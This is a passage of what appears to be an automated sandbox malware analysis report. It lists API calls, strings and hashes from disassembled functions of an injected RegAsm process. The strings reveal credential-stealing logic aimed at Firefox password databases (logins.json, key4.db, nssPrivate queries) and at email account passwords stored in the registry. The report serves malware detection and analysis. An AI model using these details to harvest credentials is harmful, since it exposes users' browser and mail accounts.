                                                                                                                                              • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                                                              • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                                              • API String ID: 4171719235-3943159138
                                                                                                                                              • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                                                                              • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                                                              • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                                                                              • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                                                              APIs
                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                                                              • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                                                              • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                                                              • GetDC.USER32 ref: 004104E2
                                                                                                                                              • strlen.MSVCRT ref: 00410522
                                                                                                                                              • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                                                              • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                                                              • sprintf.MSVCRT ref: 00410640
                                                                                                                                              • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                                                              • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                                                              • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                                              • String ID: %s:$EDIT$STATIC
                                                                                                                                              • API String ID: 1703216249-3046471546
                                                                                                                                              • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                                                                              • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                                                                              • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                                                                              • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 004024F5
                                                                                                                                                • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                              • _mbscpy.MSVCRT(?,00000000,?,?,?,770145ED,?,00000000), ref: 00402533
                                                                                                                                              • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _mbscpy$QueryValuememset
                                                                                                                                              • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                              • API String ID: 168965057-606283353
                                                                                                                                              • Opcode ID: 81b74bbce62fc48dbc6e5ab3d42279a8276b8e6c9832af4fe3da39f0be11b360
                                                                                                                                              • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                                                                              • Opcode Fuzzy Hash: 81b74bbce62fc48dbc6e5ab3d42279a8276b8e6c9832af4fe3da39f0be11b360
                                                                                                                                              • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                                                                              APIs
                                                                                                                                              • EndDialog.USER32(?,?), ref: 0040FC88
                                                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 0040FCA0
                                                                                                                                              • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040FCBF
                                                                                                                                              • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040FCCC
                                                                                                                                              • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040FCD5
                                                                                                                                              • memset.MSVCRT ref: 0040FCFD
                                                                                                                                              • memset.MSVCRT ref: 0040FD1D
                                                                                                                                              • memset.MSVCRT ref: 0040FD3B
                                                                                                                                              • memset.MSVCRT ref: 0040FD54
                                                                                                                                              • memset.MSVCRT ref: 0040FD72
                                                                                                                                              • memset.MSVCRT ref: 0040FD8B
                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 0040FD93
                                                                                                                                              • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040FDB8
                                                                                                                                              • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040FDEE
                                                                                                                                              • memset.MSVCRT ref: 0040FE45
                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 0040FE53
                                                                                                                                              • memcpy.MSVCRT(?,00457E70,00000118), ref: 0040FE82
                                                                                                                                              • _mbscpy.MSVCRT(?,00000000), ref: 0040FEA4
                                                                                                                                              • sprintf.MSVCRT ref: 0040FF0F
                                                                                                                                              • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040FF28
                                                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 0040FF32
                                                                                                                                              • SetFocus.USER32(00000000), ref: 0040FF39
                                                                                                                                              Strings
                                                                                                                                              • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040FF09
                                                                                                                                              • {Unknown}, xrefs: 0040FD02
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                                                                              • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                                                                              • API String ID: 1428123949-3474136107
                                                                                                                                              • Opcode ID: d86657001ae41ff369873dc728ed0a742e0e79a3b96cce1ecbd5be397a74016d
                                                                                                                                              • Instruction ID: dbacf55a19a30e1480a431b78f30a2e126a23dc86512cc8492e46cc2065c5524
                                                                                                                                              • Opcode Fuzzy Hash: d86657001ae41ff369873dc728ed0a742e0e79a3b96cce1ecbd5be397a74016d
                                                                                                                                              • Instruction Fuzzy Hash: 6371A972808345BFE7319B51EC41EDB7B9CFB84345F04043AF644921A2DA79DE49CB6A
                                                                                                                                              APIs
                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                                              • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                                              • SetCursor.USER32(00000000), ref: 00401166
                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                                              • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                                              • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                                              • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                                              • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                                              • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                                                              • memset.MSVCRT ref: 0040128E
                                                                                                                                              • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                                              • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                                              • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2998058495-0
                                                                                                                                              • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                                                                              • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                                                                              • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                                                                              • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                                                • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
                                                                                                                                              • SetMenu.USER32(?,00000000), ref: 0040BD23
                                                                                                                                              • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
                                                                                                                                              • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
                                                                                                                                              • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
                                                                                                                                              • LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
                                                                                                                                              • _strcmpi.MSVCRT ref: 0040BE93
                                                                                                                                              • RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
                                                                                                                                              • SetFocus.USER32(?), ref: 0040BECE
                                                                                                                                              • GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
                                                                                                                                              • GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
                                                                                                                                              • strlen.MSVCRT ref: 0040BEFE
                                                                                                                                              • strlen.MSVCRT ref: 0040BF0C
                                                                                                                                              • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
                                                                                                                                                • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
                                                                                                                                                • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
                                                                                                                                              • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
                                                                                                                                              • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
                                                                                                                                              • memset.MSVCRT ref: 0040BFDB
                                                                                                                                              • SetWindowTextA.USER32(?,?), ref: 0040BFFF
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                                                                                                              • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                                                                              • API String ID: 2303586283-933021314
                                                                                                                                              • Opcode ID: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                                                                                                                                              • Instruction ID: 018683a0c001df71ea8fb117e25ab04faf3265e4b472b332b07084323bdedb2f
                                                                                                                                              • Opcode Fuzzy Hash: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                                                                                                                                              • Instruction Fuzzy Hash: 5DC1C071644388FFEB15DF64CC45BDABBA5FF14304F04016AFA44A7292C7B5A904CBA9
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcmp$memcpy
                                                                                                                                              • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                                              • API String ID: 231171946-2189169393
                                                                                                                                              • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                              • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                                                                              • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                              • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                                              • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                              • API String ID: 633282248-1996832678
                                                                                                                                              • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                                                                              • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                                                                              • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                                                                              • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 00406782
                                                                                                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                                                                              • memcmp.MSVCRT ref: 0040686E
                                                                                                                                              • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                                                                              • memcmp.MSVCRT ref: 004068EC
                                                                                                                                              • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                                                                              • memcmp.MSVCRT ref: 004069B2
                                                                                                                                              • memcmp.MSVCRT ref: 004069CA
                                                                                                                                              • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                                                                              • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                                                                              • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                                                                              • memcmp.MSVCRT ref: 00406A4A
                                                                                                                                              • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                                                                              • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                                                                              Strings
                                                                                                                                              • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                                                                              • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                                                                              • , xrefs: 00406834
                                                                                                                                              • key4.db, xrefs: 00406756
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy$memcmp$memsetstrlen
                                                                                                                                              • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                                                              • API String ID: 3614188050-3983245814
                                                                                                                                              • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                              • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                                                                              • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                              • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                                                              • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                              • API String ID: 710961058-601624466
                                                                                                                                              • Opcode ID: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                                                                                              • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                                                                                                                              • Opcode Fuzzy Hash: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                                                                                              • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: sprintf$memset$_mbscpy
                                                                                                                                              • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                              • API String ID: 3402215030-3842416460
                                                                                                                                              • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                                                                              • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                                                                              • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                                                                              • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                                                                • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000), ref: 00407B6E
                                                                                                                                                • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                                                                • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                                                                • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                                                                • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                                • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                                • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                                                              • strlen.MSVCRT ref: 0040F139
                                                                                                                                              • strlen.MSVCRT ref: 0040F147
                                                                                                                                              • memset.MSVCRT ref: 0040F187
                                                                                                                                              • strlen.MSVCRT ref: 0040F196
                                                                                                                                              • strlen.MSVCRT ref: 0040F1A4
                                                                                                                                              • memset.MSVCRT ref: 0040F1EA
                                                                                                                                              • strlen.MSVCRT ref: 0040F1F9
                                                                                                                                              • strlen.MSVCRT ref: 0040F207
                                                                                                                                              • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                                                              • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                                                              • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                                                                • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                                                              • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                                              • API String ID: 2003275452-3138536805
                                                                                                                                              • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                                                                              • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                                                                              • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                                                                              • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0040C3F7
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                                                              • strrchr.MSVCRT ref: 0040C417
                                                                                                                                              • _mbscat.MSVCRT ref: 0040C431
                                                                                                                                              • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                                                              • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                                                              • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                                              • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                                                              • API String ID: 1012775001-1343505058
                                                                                                                                              • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                                                                              • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                                                                              • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                                                                              • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _strcmpi
                                                                                                                                              • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                              • API String ID: 1439213657-1959339147
                                                                                                                                              • Opcode ID: bb338ece618d9ae70c262b8390980321f45594aac884b5d85926e37fa653e287
                                                                                                                                              • Instruction ID: 098916069379b780452bf0adc0bc0339f4c30180c2e3981bbd8ab1a2d20b7c26
                                                                                                                                              • Opcode Fuzzy Hash: bb338ece618d9ae70c262b8390980321f45594aac884b5d85926e37fa653e287
                                                                                                                                              • Instruction Fuzzy Hash: 6F01446768576224F924226ABC17F870B44CF91BBAF31015FF519D94D5EF5CA04050AC
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 00444612
                                                                                                                                                • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                              • strlen.MSVCRT ref: 0044462E
                                                                                                                                              • memset.MSVCRT ref: 00444668
                                                                                                                                              • memset.MSVCRT ref: 0044467C
                                                                                                                                              • memset.MSVCRT ref: 00444690
                                                                                                                                              • memset.MSVCRT ref: 004446B6
                                                                                                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
